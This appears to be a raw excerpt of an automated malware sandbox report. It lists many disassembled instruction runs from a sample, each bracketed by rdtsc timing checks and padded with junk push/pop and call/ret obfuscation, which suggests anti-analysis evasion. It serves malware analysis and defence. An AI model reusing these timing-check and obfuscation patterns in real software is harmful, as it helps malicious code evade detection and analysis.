Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11E0F66 second address: 11E100C instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b jmp 00007FB80CDA387Ah 0x00000010 push 00000000h 0x00000012 push 00000000h 0x00000014 push esi 0x00000015 call 00007FB80CDA3878h 0x0000001a pop esi 0x0000001b mov dword ptr [esp+04h], esi 0x0000001f add dword ptr [esp+04h], 0000001Dh 0x00000027 inc esi 0x00000028 push esi 0x00000029 ret 0x0000002a pop esi 0x0000002b ret 0x0000002c call 00007FB80CDA3883h 0x00000031 jmp 00007FB80CDA3884h 0x00000036 pop edi 0x00000037 push 00000000h 0x00000039 add dword ptr [ebp+1244D69Eh], ebx 0x0000003f mov dword ptr [ebp+122D3641h], eax 0x00000045 xchg eax, esi 0x00000046 ja 00007FB80CDA388Dh 0x0000004c push eax 0x0000004d push eax 0x0000004e push edx 0x0000004f jmp 00007FB80CDA3883h 0x00000054 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11E0289 second address: 11E028E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11E6214 second address: 11E6245 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB80CDA3887h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ecx 0x0000000a jnc 00007FB80CDA3882h 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11E6245 second address: 11E624D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11EA1EE second address: 11EA1F3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11EA310 second address: 11EA322 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FB80D16EFD8h 0x00000008 jne 00007FB80D16EFE2h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11EA5F8 second address: 11EA611 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007FB80CDA3881h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11EA611 second address: 11EA624 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB80D16EFDFh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11EA624 second address: 11EA62A instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11EA62A second address: 11EA63D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b jc 00007FB80D16EFD6h 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11EA63D second address: 11EA659 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FB80CDA3876h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007FB80CDA387Ch 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11EA659 second address: 11EA65D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11EDEF9 second address: 11EDF12 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB80CDA3884h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11EDF12 second address: 11EDF45 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FB80D16EFDCh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jmp 00007FB80D16EFE0h 0x00000010 mov eax, dword ptr [esp+04h] 0x00000014 jl 00007FB80D16EFE2h 0x0000001a jc 00007FB80D16EFDCh 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11EDF45 second address: 11EDF59 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov eax, dword ptr [eax] 0x00000006 push eax 0x00000007 push edx 0x00000008 jbe 00007FB80CDA387Ch 0x0000000e jo 00007FB80CDA3876h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11EE071 second address: 11EE09D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov eax, dword ptr [esp+04h] 0x0000000a jnp 00007FB80D16EFE2h 0x00000010 mov eax, dword ptr [eax] 0x00000012 push eax 0x00000013 push edx 0x00000014 jl 00007FB80D16EFDCh 0x0000001a jbe 00007FB80D16EFD6h 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1188AE6 second address: 1188B16 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pushad 0x00000006 popad 0x00000007 jnl 00007FB80CDA3876h 0x0000000d pop edx 0x0000000e jmp 00007FB80CDA387Bh 0x00000013 popad 0x00000014 pushad 0x00000015 jng 00007FB80CDA3889h 0x0000001b jmp 00007FB80CDA387Dh 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1188B16 second address: 1188B52 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB80D16EFE3h 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FB80D16EFE9h 0x00000010 jmp 00007FB80D16EFDAh 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1188B52 second address: 1188B56 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1188B56 second address: 1188B60 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1188B60 second address: 1188B64 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11F4418 second address: 11F441D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11F4D45 second address: 11F4D4B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11F4D4B second address: 11F4D4F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11F4D4F second address: 11F4D67 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB80CDA387Eh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11F4D67 second address: 11F4D6B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11F518D second address: 11F5193 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11F5193 second address: 11F51C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 jnc 00007FB80D16EFD6h 0x0000000d pop edi 0x0000000e push edx 0x0000000f jmp 00007FB80D16EFDFh 0x00000014 push esi 0x00000015 pop esi 0x00000016 pop edx 0x00000017 popad 0x00000018 pushad 0x00000019 js 00007FB80D16EFDEh 0x0000001f push edx 0x00000020 pop edx 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11F530A second address: 11F5310 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11F5310 second address: 11F5314 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11F5314 second address: 11F5320 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007FB80CDA3876h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11F9170 second address: 11F9187 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 jmp 00007FB80D16EFE2h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11F9187 second address: 11F919B instructions: 0x00000000 rdtsc 0x00000002 je 00007FB80CDA3886h 0x00000008 jmp 00007FB80CDA387Ah 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11F919B second address: 11F91B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FB80D16EFDEh 0x0000000d push edx 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 pop edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11F91B5 second address: 11F91BC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11F91BC second address: 11F91C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11F91C2 second address: 11F91CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11FCB3D second address: 11FCB43 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11FCB43 second address: 11FCB60 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB80CDA3883h 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11CB962 second address: 11ABC6B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnp 00007FB80D16EFD6h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push eax 0x00000010 jo 00007FB80D16EFE7h 0x00000016 pop eax 0x00000017 nop 0x00000018 push 00000000h 0x0000001a push ecx 0x0000001b call 00007FB80D16EFD8h 0x00000020 pop ecx 0x00000021 mov dword ptr [esp+04h], ecx 0x00000025 add dword ptr [esp+04h], 00000015h 0x0000002d inc ecx 0x0000002e push ecx 0x0000002f ret 0x00000030 pop ecx 0x00000031 ret 0x00000032 lea eax, dword ptr [ebp+124806B6h] 0x00000038 mov di, cx 0x0000003b push eax 0x0000003c jmp 00007FB80D16EFDAh 0x00000041 mov dword ptr [esp], eax 0x00000044 movsx edi, dx 0x00000047 call dword ptr [ebp+122D34C7h] 0x0000004d jng 00007FB80D16F005h 0x00000053 jmp 00007FB80D16EFE1h 0x00000058 pushad 0x00000059 push eax 0x0000005a push edx 0x0000005b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11CBE5D second address: 101EAD8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 mov dword ptr [esp], eax 0x00000008 push 00000000h 0x0000000a push edx 0x0000000b call 00007FB80CDA3878h 0x00000010 pop edx 0x00000011 mov dword ptr [esp+04h], edx 0x00000015 add dword ptr [esp+04h], 00000014h 0x0000001d inc edx 0x0000001e push edx 0x0000001f ret 0x00000020 pop edx 0x00000021 ret 0x00000022 jmp 00007FB80CDA387Fh 0x00000027 push dword ptr [ebp+122D0C71h] 0x0000002d mov dword ptr [ebp+122D3521h], edi 0x00000033 call dword ptr [ebp+122D281Dh] 0x00000039 pushad 0x0000003a mov dword ptr [ebp+122D19F7h], edi 0x00000040 xor eax, eax 0x00000042 cld 0x00000043 mov edx, dword ptr [esp+28h] 0x00000047 jne 00007FB80CDA3882h 0x0000004d je 00007FB80CDA387Ch 0x00000053 mov dword ptr [ebp+122D386Eh], eax 0x00000059 or dword ptr [ebp+122D18EDh], esi 0x0000005f mov esi, 0000003Ch 0x00000064 stc 0x00000065 add esi, dword ptr [esp+24h] 0x00000069 jmp 00007FB80CDA3883h 0x0000006e or dword ptr [ebp+122D18EDh], ecx 0x00000074 lodsw 0x00000076 mov dword ptr [ebp+122D3467h], esi 0x0000007c add eax, dword ptr [esp+24h] 0x00000080 stc 0x00000081 add dword ptr [ebp+122D1984h], eax 0x00000087 mov ebx, dword ptr [esp+24h] 0x0000008b clc 0x0000008c push eax 0x0000008d push eax 0x0000008e push edx 0x0000008f jmp 00007FB80CDA387Bh 0x00000094 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11CBF70 second address: 101EAD8 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FB80D16EFD8h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d push 00000000h 0x0000000f push eax 0x00000010 call 00007FB80D16EFD8h 0x00000015 pop eax 0x00000016 mov dword ptr [esp+04h], eax 0x0000001a add dword ptr [esp+04h], 0000001Bh 0x00000022 inc eax 0x00000023 push eax 0x00000024 ret 0x00000025 pop eax 0x00000026 ret 0x00000027 push eax 0x00000028 and edx, 48A7D997h 0x0000002e pop ecx 0x0000002f mov di, dx 0x00000032 push dword ptr [ebp+122D0C71h] 0x00000038 call dword ptr [ebp+122D281Dh] 0x0000003e pushad 0x0000003f mov dword ptr [ebp+122D19F7h], edi 0x00000045 xor eax, eax 0x00000047 cld 0x00000048 mov edx, dword ptr [esp+28h] 0x0000004c jne 00007FB80D16EFE2h 0x00000052 je 00007FB80D16EFDCh 0x00000058 mov dword ptr [ebp+122D386Eh], eax 0x0000005e or dword ptr [ebp+122D18EDh], esi 0x00000064 mov esi, 0000003Ch 0x00000069 stc 0x0000006a add esi, dword ptr [esp+24h] 0x0000006e jmp 00007FB80D16EFE3h 0x00000073 or dword ptr [ebp+122D18EDh], ecx 0x00000079 lodsw 0x0000007b mov dword ptr [ebp+122D3467h], esi 0x00000081 add eax, dword ptr [esp+24h] 0x00000085 stc 0x00000086 add dword ptr [ebp+122D1984h], eax 0x0000008c mov ebx, dword ptr [esp+24h] 0x00000090 clc 0x00000091 push eax 0x00000092 push eax 0x00000093 push edx 0x00000094 jmp 00007FB80D16EFDBh 0x00000099 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11CC011 second address: 11CC015 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11CC015 second address: 11CC090 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB80D16EFE9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jmp 00007FB80D16EFE8h 0x0000000f push esi 0x00000010 pop esi 0x00000011 popad 0x00000012 popad 0x00000013 push eax 0x00000014 pushad 0x00000015 jp 00007FB80D16EFD8h 0x0000001b jmp 00007FB80D16EFE6h 0x00000020 popad 0x00000021 mov eax, dword ptr [esp+04h] 0x00000025 jmp 00007FB80D16EFE5h 0x0000002a mov eax, dword ptr [eax] 0x0000002c pushad 0x0000002d push eax 0x0000002e push edx 0x0000002f push eax 0x00000030 push edx 0x00000031 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11CC090 second address: 11CC094 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11CC094 second address: 11CC0A8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 push edi 0x00000008 pop edi 0x00000009 pop ebx 0x0000000a popad 0x0000000b mov dword ptr [esp+04h], eax 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11CC0A8 second address: 11CC0AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11CC0AC second address: 11CC0ED instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 jmp 00007FB80D16EFE8h 0x0000000c pop ebx 0x0000000d popad 0x0000000e pop eax 0x0000000f pushad 0x00000010 jp 00007FB80D16EFDCh 0x00000016 mov eax, ecx 0x00000018 popad 0x00000019 push 548CE2A3h 0x0000001e jnp 00007FB80D16EFE4h 0x00000024 push eax 0x00000025 push edx 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11CC0ED second address: 11CC0F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11CC21F second address: 11CC224 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11CC224 second address: 11CC22E instructions: 0x00000000 rdtsc 0x00000002 jl 00007FB80CDA387Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11CC3B0 second address: 11CC3BD instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 push eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c pop eax 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11CC8D0 second address: 11CC8D4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11CC8D4 second address: 11CC8DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11CC8DA second address: 11CC8E0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11CC8E0 second address: 11CC928 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b push 00000000h 0x0000000d push esi 0x0000000e call 00007FB80D16EFD8h 0x00000013 pop esi 0x00000014 mov dword ptr [esp+04h], esi 0x00000018 add dword ptr [esp+04h], 0000001Ch 0x00000020 inc esi 0x00000021 push esi 0x00000022 ret 0x00000023 pop esi 0x00000024 ret 0x00000025 add edi, dword ptr [ebp+122D396Eh] 0x0000002b push 0000001Eh 0x0000002d jmp 00007FB80D16EFDAh 0x00000032 nop 0x00000033 push eax 0x00000034 push edx 0x00000035 push ebx 0x00000036 push eax 0x00000037 pop eax 0x00000038 pop ebx 0x00000039 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11CCBFA second address: 11CCC14 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 jp 00007FB80CDA3876h 0x0000000d pop edx 0x0000000e popad 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jo 00007FB80CDA3878h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11CCC14 second address: 11CCC1A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11CCC1A second address: 11CCC1E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11CCC1E second address: 11CCC34 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esp+04h] 0x0000000c jbe 00007FB80D16EFE0h 0x00000012 push eax 0x00000013 push edx 0x00000014 push edx 0x00000015 pop edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11CCC34 second address: 11CCC4D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov eax, dword ptr [eax] 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FB80CDA387Fh 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11CCC4D second address: 11CCC57 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jg 00007FB80D16EFD6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11CCD5B second address: 11AC7A3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 pushad 0x00000009 jmp 00007FB80CDA387Ah 0x0000000e jmp 00007FB80CDA3884h 0x00000013 popad 0x00000014 lea eax, dword ptr [ebp+124806B6h] 0x0000001a push 00000000h 0x0000001c push ecx 0x0000001d call 00007FB80CDA3878h 0x00000022 pop ecx 0x00000023 mov dword ptr [esp+04h], ecx 0x00000027 add dword ptr [esp+04h], 00000017h 0x0000002f inc ecx 0x00000030 push ecx 0x00000031 ret 0x00000032 pop ecx 0x00000033 ret 0x00000034 add edx, 72910A2Ah 0x0000003a push eax 0x0000003b jmp 00007FB80CDA3888h 0x00000040 mov dword ptr [esp], eax 0x00000043 mov dword ptr [ebp+124435E1h], ebx 0x00000049 call dword ptr [ebp+122D1A0Dh] 0x0000004f pushad 0x00000050 push eax 0x00000051 push edx 0x00000052 pushad 0x00000053 popad 0x00000054 pushad 0x00000055 popad 0x00000056 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11AC7A3 second address: 11AC7A7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11AC7A7 second address: 11AC7B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11FCFE2 second address: 11FD000 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB80D16EFE8h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11FD000 second address: 11FD004 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11FD004 second address: 11FD008 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11FD166 second address: 11FD183 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB80CDA387Ah 0x00000009 jnp 00007FB80CDA3876h 0x0000000f popad 0x00000010 js 00007FB80CDA3886h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11FD2EA second address: 11FD2EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11FD56D second address: 11FD577 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 ja 00007FB80CDA3876h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11FD577 second address: 11FD5A6 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FB80D16EFD6h 0x00000008 jng 00007FB80D16EFD6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push edx 0x00000013 jmp 00007FB80D16EFE2h 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b popad 0x0000001c jo 00007FB80D16EFD6h 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12011E4 second address: 12011EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1205C2A second address: 1205C55 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB80D16EFE0h 0x00000007 jl 00007FB80D16EFD6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 push esi 0x00000011 pop esi 0x00000012 pushad 0x00000013 popad 0x00000014 popad 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 jc 00007FB80D16EFD8h 0x0000001e pushad 0x0000001f popad 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1205C55 second address: 1205C5B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
